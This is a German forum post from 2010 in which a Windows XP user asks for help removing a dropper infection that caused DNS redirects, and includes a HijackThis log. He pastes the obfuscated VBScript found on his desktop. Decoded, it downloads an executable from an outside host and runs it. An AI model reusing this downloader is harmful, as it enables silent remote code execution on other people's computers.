| GoodFella | 31.12.2010 13:01 |
Win32:Dropper-EPI in explorer.exe und DNS-Umleitung
Hi,
da ich Firefox 3.0 verwende habe ich mir offensichtlich etwas darüber eingefangen.
Mein System:
Win XP SP3
Symptome:
Normale Seitenaufrufe wurden / (werden?) auf werbeseiten umgeleitet.
Nach Aufruf des Internet Explorers 7 und Seitenaufruf hat sich dieser aufgehängt, die cmd.exe wurde kurz ausgeführt, ich hatte irgendeine kryptische vbscript-datei auf dem desktop - habe ich natürlich gelöscht. Dann hat mir Sygate angezeigt, meine Explorer.exe hätte sich verändert. Schnell bei Jotti hochgeladen - hxxp://virusscan.jotti.org/de/scanresult/0633043e1b907c431998d5d742d05f691c91ef32
In der VBScript-Datei stand: Code:
Execute(strReverse(Replace(Replace(")htap(cexe.lhs|2,htap elifotevas.oda|)ydoBesnopser.lmx(etirw.oda|nepo.oda|1=epyt.oda|3=edom.oda|dnes.lmx|0,Y6=e&1=f?php.daol/1/cc.oc.hg4gg4rg//:ptthY,YTEGY nepo.lmx|Yexe.~/:cY = htap|)Yllehs.tpircswY(tcejbOetaerC=lhs teS|)Ymaerts.bdodaY(tcejbOetaerC=oda teS|)Yptthlmx.tfosorcimY(tcejbOetaerC=lmx tes|txen emuser rorre no", "Y", chr(34)), "|", vbcrlf)))
..offensichtlich hat es sich in explorer.exe und winlogon.exe eingenistet.
Was ich getan habe:
HighJackThis - Nix gefunden
GMER - Nix gefunden
Spybot S&D - Nix gefunden
Gerade eben habe ich Malwarebytes AV installiert, mal sehen was das bringt.
HighJackThis Log: Code:
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 12:59:45, on 31.12.2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal
Running processes:
C:\WINXP\System32\smss.exe
C:\WINXP\system32\winlogon.exe
C:\WINXP\system32\services.exe
C:\WINXP\system32\lsass.exe
C:\WINXP\system32\nvsvc32.exe
C:\WINXP\system32\svchost.exe
C:\WINXP\System32\svchost.exe
C:\Programme\Sygate\SPF\Smc.exe
C:\WINXP\System32\svchost.exe
C:\WINXP\System32\svchost.exe
C:\WINXP\System32\svchost.exe
C:\WINXP\system32\svchost.exe
C:\WINXP\Explorer.EXE
C:\Programme\Skype\Phone\Skype.exe
C:\Programme\Hamachi\hamachi.exe
C:\Programme\Mozilla Firefox\firefox.exe
L:\Install\Sicherheit\HijackThis.exe
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = file:///C:/Home/Home.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Programme\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINXP\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware (registration)] regsvr32.exe /s "C:\Programme\Malwarebytes' Anti-Malware\mbamext.dll"
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Programme\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O10 - Unknown file in Winsock LSP: c:\programme\vmware\vmware player\vsocklib.dll
O10 - Unknown file in Winsock LSP: c:\programme\vmware\vmware player\vsocklib.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL
O23 - Service: Avira AntiVir Personal - Free Antivirus Planer (AntiVirScheduler) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: Avira AntiVir Personal - Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: CrossLoop Service (CrossLoopService) - CrossLoop Inc - C:\Dokumente und Einstellungen\anonymous\Lokale Einstellungen\Anwendungsdaten\CrossLoop\CrossLoopService.exe
O23 - Service: Firebird Server - MAGIX Instance (FirebirdServerMAGIXInstance) - MAGIX® - C:\Programme\MAGIX\Common\Database\bin\fbserver.exe
O23 - Service: MagicTuneEngine - Unknown owner - C:\Programme\MagicTune Premium\MagicTuneEngine.exe
O23 - Service: MySQL - Unknown owner - C:\Programme\MySQL\MySQL.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\WINXP\system32\nvsvc32.exe
O23 - Service: Sandboxie Service (SbieSvc) - tzuk - C:\Programme\Sandboxie\SbieSvc.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Programme\Sygate\SPF\Smc.exe
O23 - Service: TightVNC Server (tvnserver) - GlavSoft LLC. - C:\Dokumente und Einstellungen\anonymous\Lokale Einstellungen\Anwendungsdaten\CrossLoop\tvnserver.exe
O23 - Service: VMware Agent Service (ufad-ws60) - VMware, Inc. - C:\Programme\VMware\VMware Player\vmware-ufad.exe
O23 - Service: Messenger USN Journal Reader-Service für freigegebene Ordner (usnjsvc) - Unknown owner - C:\Programme\MSN Messenger\usnsvc.exe (file missing)
O23 - Service: VMware Authorization Service (VMAuthdService) - VMware, Inc. - C:\Programme\VMware\VMware Player\vmware-authd.exe
O23 - Service: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\WINXP\system32\vmnetdhcp.exe
O23 - Service: VMware USB Arbitration Service (VMUSBArbService) - VMware, Inc. - C:\Programme\Common Files\VMware\USB\vmware-usbarbitrator.exe
O23 - Service: VMware NAT Service - VMware, Inc. - C:\WINXP\system32\vmnat.exe
--
End of file - 4143 bytes
Es wäre toll, wenn mich jemand an die Hand nehmen könnte, um das zu bereinigen ohne meinen PC neu zu installieren.
Gruss
GF | 